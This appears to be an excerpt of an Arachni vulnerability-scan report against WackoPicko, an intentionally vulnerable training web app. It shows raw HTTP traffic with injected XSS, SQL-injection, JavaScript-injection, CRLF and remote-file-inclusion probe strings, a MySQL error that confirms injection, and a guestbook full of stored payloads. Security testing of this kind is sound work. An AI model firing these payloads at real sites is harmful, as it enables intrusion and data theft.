    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
        <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
        <div class="column prepend-1 span-14 first">
          <ul class="menu">
            <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
            <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
                </ul>
        </div>
        <div class="column prepend-1 span-7 first last">
          <ul class="menu top_login" >
                  <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
                </ul>
        </div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
        <div class="column prepend-17 span-7 first last" id="search_box">
          <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
            <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
            <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
          </form>
        </div>
      </div>
   

<div class="column prepend-1 span-24 first last">
  <h2>Welcome to WackoPicko</h2>
  <p>
    On WackoPicko, you can share all your crazy pics with your friends. <br />
    But that's not all, you can also buy the rights to the high quality <br />
    version of someone's pictures. WackoPicko is fun for the whole family.
  </p>

  <h3>New Here?</h3>
  <p>
    <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
  </p>
  <p>
    <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
  </p>
  <p>
    <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
  <script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();


    document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
  </script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->

  </p>
</div>


       <div class="column span-24 first last" id="footer" >
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  </body>
</html>  
   

Injected seed Proof
()"&%1'-;<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>'
<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<form action="/WackoPicko/users/login.php" method="POST">
  <tr>
    <td>
      Username :
    </td>
    <td>
      <input type="text" name="username">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      Password :
    </td>
    <td>
      <input type="password" name="password">
      </input>
    </td>
  </tr>
  <tr>
    <td>
      <input type="submit" value="login">
      </input>
    </td>
    <td>
      <a href="/WackoPicko/users/register.php">
        Register
      </a>
    </td>
  </tr>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/users/login.php http://192.168.0.26/WackoPicko/users/login.php
username
password
username
arachni_name()"&%1'-;<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>'
password
5543!%arachni_secret
HTTP request

Raw HTTP request used to retrieve the page.

POST /WackoPicko/users/login.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72
Content-Length: 126
Content-Type: application/x-www-form-urlencoded

username=arachni_name%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27&password=5543%21%25arachni_secret
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:54 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 203
Content-Type: text/html

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-;<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>'' and `password` = SHA1( CONCAT('5543!' at line 1
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/users/login.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 303 See Other
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /WackoPicko/users/login.php
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Content-Type: text/html

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:50:41 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 958
Content-Type: text/html

<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-23 first last">
    <h2>Login</h2>
        <table style="width:320px" cellspacing="0">
      <form action="/WackoPicko/users/login.php" method="POST">
      <tr><td>Username :</td><td> <input type="text" name="username" /></td></tr>
      <tr><td>Password :</td><td> <input type="password" name="password" /></td></tr>
      <tr><td><input type="submit" value="login" /></td><td> <a href="/WackoPicko/users/register.php">Register</a></td></tr>
   </form>
 </table>
</div>
          <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Injected seed Proof
<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<form action="/WackoPicko/guestbook.php" method="POST">
  Name:
  <br>
  </br>
  <input type="text" name="name">
  </input>
  <br>
  </br>
  Comment:
  <br>
  </br>
  <textarea id="comment-box" name="comment">
    
  </textarea>
  <br>
  </br>
  <input type="submit" value="Submit">
  </input>
</form>
Type In Action Default inputs Updated inputs
form http://192.168.0.26/WackoPicko/guestbook/ http://192.168.0.26/WackoPicko/guestbook.php
comment
name
comment
1<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
name
arachni_name
HTTP request

Raw HTTP request used to retrieve the page.

POST /WackoPicko/guestbook.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72
Content-Length: 72
Content-Type: application/x-www-form-urlencoded

comment=1%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E&name=arachni_name
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:03 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1772
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">1</p>
	<p> - by arachni_name%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3 </p>
		<p class="comment">1%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27 </p>
		<p class="comment">1</p>
	<p> - by arachni_name()&quot;&amp;%1'-;&lt;xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/&gt;' </p>
		<p class="comment">1</p>
	<p> - by arachni_name%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E </p>
		<p class="comment">1<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/></p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot; </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot; </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot;// </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
	<p> - by arachni_name </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot;// </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">1</p>
	<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:"</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name]]]]]]]]] </p>
		<p class="comment">1]]]]]]]]]</p>
	<p> - by arachni_name </p>
		<p class="comment">1<!--</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name#^($!@$)(()))****** </p>
		<p class="comment">1</p>
	<p> - by arachni_name'&quot; </p>
		<p class="comment">1</p>
	<p> - by arachni_name&lt;!-- </p>
		<p class="comment">1#^($!@$)(()))******</p>
	<p> - by arachni_name </p>
		<p class="comment"></script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script></p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
		<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
	<p> - by arachni_name </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
		<p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
		<p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt; </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by &quot;,x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:&quot; </p>
		<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
	<p> - by arachni_name </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1'"</p>
	<p> - by arachni_name </p>
		<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
	<p> - by arachni_name </p>
		<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
		<p class="comment">1</p>
	<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
	<p> - by arachni_name </p>
		<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
	<p> - by arachni_name </p>
		<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
		<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1</p>
	<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">1</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
		<p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
	<p> - by arachni_name </p>
		<p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
	<p> - by arachni_name </p>
		<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/guestbook/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 978
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
